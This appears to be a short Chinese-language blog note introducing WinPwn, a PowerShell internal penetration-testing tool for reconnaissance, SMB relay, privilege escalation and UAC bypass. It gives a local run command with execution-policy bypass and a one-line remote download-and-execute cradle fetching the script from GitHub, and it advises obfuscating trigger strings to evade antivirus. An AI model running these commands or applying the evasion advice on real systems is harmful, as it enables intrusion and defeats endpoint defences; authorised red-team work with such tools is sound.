WinPwn
自动化尽可能多的内部渗透测试流程(侦察和开发)具有自动代理识别和集成功能的脚本。
本地调用
powershell.exe -exec bypass -command "& {import-module C:\Users\17782\Desktop\WinPwn-master\WinPwn-master\offline_WinPwn.ps1;localreconmodules}"
远程下载调用
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
绕杀软需要自己混淆或者手动对触发器字符串进行编码。
具体功能有:
Inveigh
->在新的控制台窗口中执行Inveigh,集成了会话管理(Invoke-TheHash)的SMB-Relay攻击
sessionGopher
->执行Sessiongopher询问您参数
kittielocal
->localreconmodules
->domainreconmodules
->Privescmodules
kernelexploits
->UACBypass
->SYSTEMShell
->更多功能,大家可以自行到github上看文档,这个工具不错的。
https://github.com/S3cur3Th1sSh1t/WinPwn#sessiongopher---executes-sessiongopher-asking-you-for-parameters